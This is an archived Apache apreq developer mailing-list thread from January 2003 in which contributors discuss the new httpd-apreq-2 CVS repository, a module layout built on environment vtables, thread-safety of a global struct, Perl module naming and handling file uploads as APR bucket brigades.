Subject: the new 2.0 cvs rep is available References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Stas Bekman wrote: > Joe Schaefer wrote: > >> Stas Bekman <[email protected]> writes: >> >> [...] >> >> >>> We all agree that waiting for httpd people to give a grace is a >>> complete waste of time. I suggest that we ask Brian Behlendorf to >>> create the apreq-2.0 repository and start working there. It's >>> important for preserving the history of changes. I see no reason why >>> not to do it *now*. Having a repository doesn't mean having a >>> production version of the code. >> >> >> >> Yes, agreed- that would be best. Unfortunately, according to >> /home/cvs/README, the first step in creating a new cvs repository is: >> >> (a) Get permission from your PMC. The PMC must approve the addition >> of any repository and should be contacted through the normal means. >> >> That puts us back at square one, since (I think) our PMC is httpd. I >> haven't yet lowered my self-esteem enough to now beg them for a new >> repository to begin our work. >> If there's a way to make things happen within our existing repository, >> that'd be a lot less painful for me to endure. At least then, it's >> just technical obstacles that we will face. > > > Let me run this through the asf members list. I have no clue what's the > status of the apreq project is. I thought it was a standalone project > with its own pmc. Hopefully this can be resolved quickly. > > I pretty much doubt anybody at httpd will be against creating a new > apreq-2.0 rep. or is it httpd-apreq-2.0? Thanks to Brian Behlendorf (and silence from the httpd pmc ;) we now have a new shiny toy to play with: the httpd-apreq-2 cvs rep. You want to [email protected] to see Joe play with it. (that's the same list, the httpd-apreq commits go to). __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Thu Jan 16 04:14:52 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12490 invoked by uid 500); 16 Jan 2003 04:14:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 12478 invoked from network); 16 Jan 2003 04:14:51 -0000 To: apreq list <[email protected]> Subject: apreq-2 layout From: Joe Schaefer <[email protected]> Date: 15 Jan 2003 23:21:14 -0500 Message-ID: <[email protected]> Lines: 101 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Here are a few things I've decided to try for httpd-apreq-2. Comments appreciated. httpd-apreq-2/src/ This is the core APR-based part of apreq-2. I'm refactoring my code a bit to pull out the httpd dependencies. For now the httpd-specific code will be moved somewhere into env/. httpd-apreq-2/env/ This is where the real "porting" is done. Conceivably apache-1.3, apache-2.0, and apache-2.2 can all be independently bound to the apreq-2 core, as could other environments like CGI. ( Note: If the "split" doesn't work out, we can drop env/ and put the httpd dependencies back into src/. ) So far, I'm basing the split on the following vtables: -------------------------------------------------- struct apreq_request_env { apreq_request_t *(*make)(void *ctx); apr_status_t (*init)(void *ctx, apreq_parser_cfg_t *cfg); apr_status_t (*parse)(apreq_request_t *req); }; struct apreq_cookie_env { const char *(*in)(void *ctx); const char *(*in2)(void *ctx); apr_status_t (*out)(void *ctx, char *c); apr_status_t (*out2)(void *ctx, char *c); }; struct apreq_env { struct apreq_request_env r; struct apreq_cookie_env c; apr_pool_t *(*pool)(void *ctx); void (*log)(const char *file, int line, int level, apr_status_t status, void *ctx, const char *fmt, ...); }; -------------------------------------------------- With this setup, "porting apreq-2" is basically a matter of populating the global variable "APReq": extern struct apreq_env APReq; The actual details will get spelled out in src/apreq_env.h, but this is *very* rough at the moment (particularly the apreq_request_env struct). httpd-apreq-2/glue/ This is where the language bindings will go. The glue should provide interfaces for most of the stuff in src/, and treat the code in env/ as optional. Ideally apreq-2 ports will work without any coaxing, so the env/ code shouldn't *need* glue. For example, here's some sketchy ideas for the perl glue: conventional (modperl) APIs: Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest These may need some env/ glue, since they are Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bCookie modperl-specific. new (abstract) APIs: APReqacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable data store (very similar to APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable) APReqacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bookie Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bCookie, without the CGIacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bookie semantics for cookie-value encoding APReqacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest without Apache as its base class. For modperl, APReqacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest will probably need to use delegation, not inheritance ( similar to DBI ) to get at the Apache->request methods. Programs that use APReqacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b modules should be maximally portable to other environments. The XS for the new modules should be environment-agnostic, so code that uses only these modules should be portable to other environments (well, that's my theory :-). <issue type="bikeshed"> Oh yeah, are there any preferences on the capitalization of apreq for the perl-module namespace? I'm using APReq here and there now, and I much prefer it over "ApReq". Another alternative is APREQ, which would be ok with me. </issue> Ok, that's probably enough vagaries for now. Unless there's serious objections to this layout, I'll start dumping code into src/. -- Joe Schaefer From [email protected] Thu Jan 16 04:32:37 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16260 invoked by uid 500); 16 Jan 2003 04:32:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 16249 invoked from network); 16 Jan 2003 04:32:35 -0000 Message-ID: <[email protected]> Date: Thu, 16 Jan 2003 15:33:21 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> Subject: Re: apreq-2 layout References: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: > Here are a few things I've decided to try for httpd-apreq-2. > Comments appreciated. > > httpd-apreq-2/src/ > > This is the core APR-based part of apreq-2. I'm refactoring > my code a bit to pull out the httpd dependencies. For now > the httpd-specific code will be moved somewhere into env/. > > httpd-apreq-2/env/ > > This is where the real "porting" is done. Conceivably apache-1.3, > apache-2.0, and apache-2.2 can all be independently bound to the > apreq-2 core, as could other environments like CGI. > > ( Note: If the "split" doesn't work out, we can drop env/ and > put the httpd dependencies back into src/. ) Since it's not going to be a drop-in patch anymore, the biggest trouble is to produce the new autoconf m4 files to find apr/apr-util/apache. Hopefully the relevant code can be ripped of mod_perl 2.0. > So far, I'm basing the split on the following vtables: > -------------------------------------------------- > struct apreq_request_env { > apreq_request_t *(*make)(void *ctx); > apr_status_t (*init)(void *ctx, apreq_parser_cfg_t *cfg); > apr_status_t (*parse)(apreq_request_t *req); > }; > > struct apreq_cookie_env { > const char *(*in)(void *ctx); > const char *(*in2)(void *ctx); > > apr_status_t (*out)(void *ctx, char *c); > apr_status_t (*out2)(void *ctx, char *c); > }; > > struct apreq_env { > struct apreq_request_env r; > struct apreq_cookie_env c; > apr_pool_t *(*pool)(void *ctx); > void (*log)(const char *file, int line, int level, > apr_status_t status, void *ctx, const char *fmt, ...); > }; > -------------------------------------------------- > With this setup, "porting apreq-2" is basically a > matter of populating the global variable "APReq": > > extern struct apreq_env APReq; Careful with globals. We are potentially running in a threaded env in 2.0. I'd rather see a compile time resolving. > The actual details will get spelled out in src/apreq_env.h, > but this is *very* rough at the moment (particularly the > apreq_request_env struct). > > > httpd-apreq-2/glue/ > > This is where the language bindings will go. The glue should > provide interfaces for most of the stuff in src/, > and treat the code in env/ as optional. Ideally apreq-2 ports > will work without any coaxing, so the env/ code shouldn't > *need* glue. > > For example, here's some sketchy ideas for the perl glue: > > conventional (modperl) APIs: > > Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest These may need some env/ glue, since they are > Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bCookie modperl-specific. > > > new (abstract) APIs: > > APReqacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable data store (very similar to APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable) > > APReqacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bookie Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bCookie, without the CGIacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bookie > semantics for cookie-value encoding > > APReqacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest without Apache as its base class. > For modperl, APReqacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest will probably need to > use delegation, not inheritance ( similar to DBI ) > to get at the Apache->request methods. > Programs that use APReqacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b modules should be > maximally portable to other environments. > > The XS for the new modules should be environment-agnostic, so code > that uses only these modules should be portable to other environments > (well, that's my theory :-). > > <issue type="bikeshed"> > Oh yeah, are there any preferences on the capitalization of apreq for the > perl-module namespace? I'm using APReq here and there now, and I much > prefer it over "ApReq". Another alternative is APREQ, which would be > ok with me. > </issue> I'm -0 on APReq as it's too similar to APR. Both APREQ and ApReq are fine with me. AR sounds cool too, but that won't map well into apreq_. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Thu Jan 16 04:44:30 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21505 invoked by uid 500); 16 Jan 2003 04:44:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 21494 invoked from network); 16 Jan 2003 04:44:29 -0000 To: Stas Bekman <[email protected]> Cc: apreq list <[email protected]> Subject: Re: apreq-2 layout References: <[email protected]> <[email protected]> From: Joe Schaefer <[email protected]> Date: 15 Jan 2003 23:50:54 -0500 In-Reply-To: Stas Bekman's message of "Thu, 16 Jan 2003 15:33:21 +1100" Message-ID: <[email protected]> Lines: 15 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Stas Bekman <[email protected]> writes: [...] > > extern struct apreq_env APReq; > > Careful with globals. We are potentially running in a threaded env in 2.0. > I'd rather see a compile time resolving. The global struct should only get populated once, at process startup, and then remain unchanged (the attributes are all function pointers). Threading shouldn't be a problem here, should it? -- Joe Schaefer From [email protected] Thu Jan 16 04:58:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32358 invoked by uid 500); 16 Jan 2003 04:58:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 32347 invoked from network); 16 Jan 2003 04:58:15 -0000 Message-ID: <[email protected]> Date: Thu, 16 Jan 2003 15:59:01 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> Subject: Re: apreq-2 layout References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: > Stas Bekman <[email protected]> writes: > > [...] > > >>> extern struct apreq_env APReq; >> >>Careful with globals. We are potentially running in a threaded env in 2.0. >>I'd rather see a compile time resolving. > > The global struct should only get populated once, at process startup, > and then remain unchanged (the attributes are all function pointers). > Threading shouldn't be a problem here, should it? what happens if two threads both startup at the same time? Also will this work with two sub-system using it in the same process, where each assigns a different value to it? Why not using an accessor method to retrieve a copy of the struct? __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Thu Jan 16 05:12:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38355 invoked by uid 500); 16 Jan 2003 05:12:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 38344 invoked from network); 16 Jan 2003 05:12:08 -0000 To: Stas Bekman <[email protected]> Cc: apreq list <[email protected]> Subject: Re: apreq-2 layout References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> From: Joe Schaefer <[email protected]> Date: 16 Jan 2003 00:18:33 -0500 In-Reply-To: Stas Bekman's message of "Thu, 16 Jan 2003 15:59:01 +1100" Message-ID: <[email protected]> Lines: 35 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Stas Bekman <[email protected]> writes: > Joe Schaefer wrote: [...] > > The global struct should only get populated once, at process startup, > > and then remain unchanged (the attributes are all function pointers). > > Threading shouldn't be a problem here, should it? > > what happens if two threads both startup at the same time? Threads are subsidiary to processes, right? By the time threads start showing up, the struct should have already been completely filled in. I don't envision a situation where two threads, running within the same process space, should try running apreq-2 under two different "environments". Remember, different environments represent different application interfaces for apreq-2: one environment for httpd-2.0, one for httpd-2.2, one for apache-1.3, one for CGI on *nix, etc. > Also will this work with two sub-system using it in the same process, > where each assigns a different value to it? It's not designed for such uses; hopefully I've now explained why. > Why not using an accessor method to retrieve a copy of the struct? We could do that, but right now I don't see the need for it. -- Joe Schaefer From [email protected] Thu Jan 16 05:43:40 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52527 invoked by uid 500); 16 Jan 2003 05:43:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 52500 invoked from network); 16 Jan 2003 05:43:39 -0000 Message-ID: <[email protected]> Date: Thu, 16 Jan 2003 16:44:25 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> Subject: Re: apreq-2 layout References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: > Stas Bekman <[email protected]> writes: > > >>Joe Schaefer wrote: > > > [...] > > >>>The global struct should only get populated once, at process startup, >>>and then remain unchanged (the attributes are all function pointers). >>>Threading shouldn't be a problem here, should it? >> >>what happens if two threads both startup at the same time? > > > Threads are subsidiary to processes, right? By the time threads > start showing up, the struct should have already been completely > filled in. consider: use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest; assuming that the apreq lib is self-contained in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest, and otherwise is not loaded at compile time. > I don't envision a situation where two threads, running within the > same process space, should try running apreq-2 under two different > "environments". Remember, different environments represent > different application interfaces for apreq-2: one environment for > httpd-2.0, one for httpd-2.2, one for apache-1.3, one for CGI on *nix, > etc. e.g. httpd decides to adopt apreq for input filters. mod_perl uses a standalone apreq. Here you have to libs colliding. >>Also will this work with two sub-system using it in the same process, >>where each assigns a different value to it? > > > It's not designed for such uses; hopefully I've now explained why. > > >>Why not using an accessor method to retrieve a copy of the struct? > > > We could do that, but right now I don't see the need for it. True, this could be changed later. But I see no reason why not do it in first place. In any case, whatever you decide is fine for now. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Thu Jan 16 06:46:40 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77586 invoked by uid 500); 16 Jan 2003 06:46:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 77575 invoked from network); 16 Jan 2003 06:46:39 -0000 To: Stas Bekman <[email protected]> Cc: apreq list <[email protected]> Subject: Re: apreq-2 layout References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> From: Joe Schaefer <[email protected]> Date: 16 Jan 2003 01:53:05 -0500 In-Reply-To: Stas Bekman's message of "Thu, 16 Jan 2003 16:44:25 +1100" Message-ID: <[email protected]> Lines: 41 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Stas Bekman <[email protected]> writes: [...] > consider: > > use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest; > > assuming that the apreq lib is self-contained in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest, and > otherwise is not loaded at compile time. Yeah, that could be bad. [...] > e.g. httpd decides to adopt apreq for input filters. mod_perl uses a > standalone apreq. Here you have to libs colliding. Eww, yuck. [...] > True, this could be changed later. But I see no reason why not do it > in first place. In any case, whatever you decide is fine for now. I am hoping to build just one libapreq-2 library that can be loaded (or linked) into different environments. For the specific case of httpd-2, in env/ I am cobbling together an apache module that will initialize the global struct at server startup, and would also register the necessary filter. "libapreq" would be initialized within the server long before perl sees "use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest", which instead of loading libapreq, might notify "mod_apreq" to engage the apreq_filter. Basically what I'm saying right now is that, in my mind, there is no "stand alone" version of apreq-2. However, you've raised some issues I've overlooked. It certainly needs more consideration. -- Joe Schaefer From [email protected] Thu Jan 16 06:58:33 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82665 invoked by uid 500); 16 Jan 2003 06:58:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 82595 invoked from network); 16 Jan 2003 06:58:32 -0000 Message-ID: <[email protected]> Date: Thu, 16 Jan 2003 17:59:20 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> Subject: Re: apreq-2 layout References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: > Stas Bekman <[email protected]> writes: > > [...] > > >>consider: >> >>use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest; >> >>assuming that the apreq lib is self-contained in Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest, and >>otherwise is not loaded at compile time. > > > Yeah, that could be bad. > > [...] > > >>e.g. httpd decides to adopt apreq for input filters. mod_perl uses a >>standalone apreq. Here you have to libs colliding. > > > Eww, yuck. > > [...] > > >>True, this could be changed later. But I see no reason why not do it >>in first place. In any case, whatever you decide is fine for now. > > > I am hoping to build just one libapreq-2 library that can be > loaded (or linked) into different environments. For the specific > case of httpd-2, in env/ I am cobbling together an apache module > that will initialize the global struct at server startup, > and would also register the necessary filter. "libapreq" would > be initialized within the server long before perl sees > "use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequest", which instead of loading libapreq, might > notify "mod_apreq" to engage the apreq_filter. > > Basically what I'm saying right now is that, in my mind, > there is no "stand alone" version of apreq-2. However, > you've raised some issues I've overlooked. It certainly > needs more consideration. Delegating the initialization of the struct (and killing the global, altogether) to the "client" glue/env should solve the problem, since the client's component knows in what environment it runs and should be able to add special #ifdefs and locking if needed in threaded env. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Sun Jan 19 16:40:06 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3740 invoked by uid 500); 19 Jan 2003 16:40:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 3665 invoked from network); 19 Jan 2003 16:40:05 -0000 To: apreq list <[email protected]> Subject: apreq-2 uploads as bucket brigades? From: Joe Schaefer <[email protected]> Date: 19 Jan 2003 11:46:30 -0500 Message-ID: <[email protected]> Lines: 32 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N I'd like to drop the req->upload linked list of temp files, and use bucket brigades in their place. I'd planning to use a common apreq_param_t struct which extends apreq_value_t like so: struct apreq_param_t { enum { ASCII, UTF_8, UTF_16, IS0_LATIN_1 } charset; char *language; apreq_table_t *info; /* mime headers */ apr_bucket_brigade *bb; /* represents file contents */ apreq_value_t v; }; The main advantage of this approach would be that we can use the full bucket api for managing the upload data. The brigade could use heap-allocated buckets for smaller uploads, and then switch over to mmapped or file buckets after a certain size. The bucket API makes this look pretty easy. The main disadvantage of this approach would be that we'd need to support the full bucket api for managing the upload. With actual files, seek(), dup(), link(), and buffered read() are natural operations. I think we'd have to provide a compatibility layer for some of these, perhaps using a meta-bucket at the front of the brigade? -- Joe Schaefer From [email protected] Sun Jan 19 17:59:07 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30588 invoked by uid 500); 19 Jan 2003 17:59:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 30577 invoked from network); 19 Jan 2003 17:59:06 -0000 Message-ID: <047b01c2bfe4$795f4290$3f0aa8c0@fmenc001dev> From: "Issac Goldstand" <[email protected]> To: "Joe Schaefer" <[email protected]> Cc: "apreq list" <[email protected]> References: <[email protected]> Subject: Re: apreq-2 uploads as bucket brigades? Date: Sun, 19 Jan 2003 19:59:10 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N OK, but... Why not do both? Eg, provide access via bucket brigades and also keep the spooled files for more natural seek()ing (,etc)? Issac ----- Original Message ----- From: "Joe Schaefer" Subject: apreq-2 uploads as bucket brigades? > > I'd like to drop the req->upload linked list of temp files, > and use bucket brigades in their place. I'd planning to > use a common apreq_param_t struct which extends apreq_value_t > like so: > > struct apreq_param_t { > enum { ASCII, UTF_8, UTF_16, IS0_LATIN_1 } charset; > char *language; > apreq_table_t *info; /* mime headers */ > > apr_bucket_brigade *bb; /* represents file contents */ > > apreq_value_t v; > }; > > > The main advantage of this approach would be that we can use > the full bucket api for managing the upload data. The brigade > could use heap-allocated buckets for smaller uploads, and then > switch over to mmapped or file buckets after a certain size. > The bucket API makes this look pretty easy. > > The main disadvantage of this approach would be that we'd need > to support the full bucket api for managing the upload. > With actual files, seek(), dup(), link(), and buffered read() > are natural operations. I think we'd have to provide a > compatibility layer for some of these, perhaps using a > meta-bucket at the front of the brigade? > > -- > Joe Schaefer > From [email protected] Sun Jan 19 18:33:58 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43011 invoked by uid 500); 19 Jan 2003 18:33:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 42997 invoked from network); 19 Jan 2003 18:33:57 -0000 To: "Issac Goldstand" <[email protected]> Cc: "apreq list" <[email protected]> Subject: Re: apreq-2 uploads as bucket brigades? References: <[email protected]> <047b01c2bfe4$795f4290$3f0aa8c0@fmenc001dev> From: Joe Schaefer <[email protected]> Date: 19 Jan 2003 13:40:23 -0500 In-Reply-To: "Issac Goldstand"'s message of "Sun, 19 Jan 2003 19:59:10 +0200" Message-ID: <[email protected]> Lines: 31 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.5 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N "Issac Goldstand" <[email protected]> writes: > OK, but... > Why not do both? Eg, provide access via bucket brigades > and also keep the spooled files for more natural seek()ing > (,etc)? Performance is one reason. If we don't *need* apreq to use the OS's filesystem for spooling, we shouldn't. We can leave that up to the application, but we could make it easy for them to pretend uploads are always files by providing things like apreq_upload_link(apreq_upload_t *upload) apreq_upload_seek(apreq_upload_t *upload) ... instead of just handing them a *FILE pointer to play with. IOW, generate the upload structs from the underlying brigade, and let that struct be responsible for emulating whatever additional file-type APIs we need. Of course the upload_hook API will also need to change, since the hooks would be responsible for generating the bucket brigade. upload_hooks should be using the bucket brigade api, *not* our apreq_upload api. The hooks are really parser extensions, so they should be stream-oriented anyways. -- Joe Schaefer From [email protected] Sun Jan 19 22:38:21 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73818 invoked by uid 500); 19 Jan 2003 22:38:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 73807 invoked from network); 19 Jan 2003 22:38:21 -0000 Message-ID: <[email protected]> Date: Mon, 20 Jan 2003 09:39:08 +1100 From: Stas Bekman <[email protected]> Organization: Hope, Humanized User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Joe Schaefer <[email protected]> Cc: apreq list <[email protected]> Subject: Re: apreq-2 uploads as bucket brigades? References: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Joe Schaefer wrote: > I'd like to drop the req->upload linked list of temp files, > and use bucket brigades in their place. I'd planning to > use a common apreq_param_t struct which extends apreq_value_t > like so: > > struct apreq_param_t { > enum { ASCII, UTF_8, UTF_16, IS0_LATIN_1 } charset; > char *language; > apreq_table_t *info; /* mime headers */ > > apr_bucket_brigade *bb; /* represents file contents */ > > apreq_value_t v; > }; > > > The main advantage of this approach would be that we can use > the full bucket api for managing the upload data. The brigade > could use heap-allocated buckets for smaller uploads, and then > switch over to mmapped or file buckets after a certain size. > The bucket API makes this look pretty easy. And you can even write upload hook filters with that ;) I agree that using a polished bb API, will make apreq's code more robust, and may be shorter? > The main disadvantage of this approach would be that we'd need > to support the full bucket api for managing the upload. > With actual files, seek(), dup(), link(), and buffered read() > are natural operations. I think we'd have to provide a > compatibility layer for some of these, perhaps using a > meta-bucket at the front of the brigade? Why would you really want to support all of them? Just croak for non-implemented ones and if wanted the implementation can come later. __________________________________________________________________ Stas Bekman JAm_pH ------> Just Another mod_perl Hacker http://stason.org/ mod_perl Guide ---> http://perl.apache.org mailto:[email protected] http://use.perl.org http://apacheweek.com http://modperlbook.org http://apache.org http://ticketmaster.com From [email protected] Sun Jan 19 23:52:16 2003 Return-Path: <[email protected]> 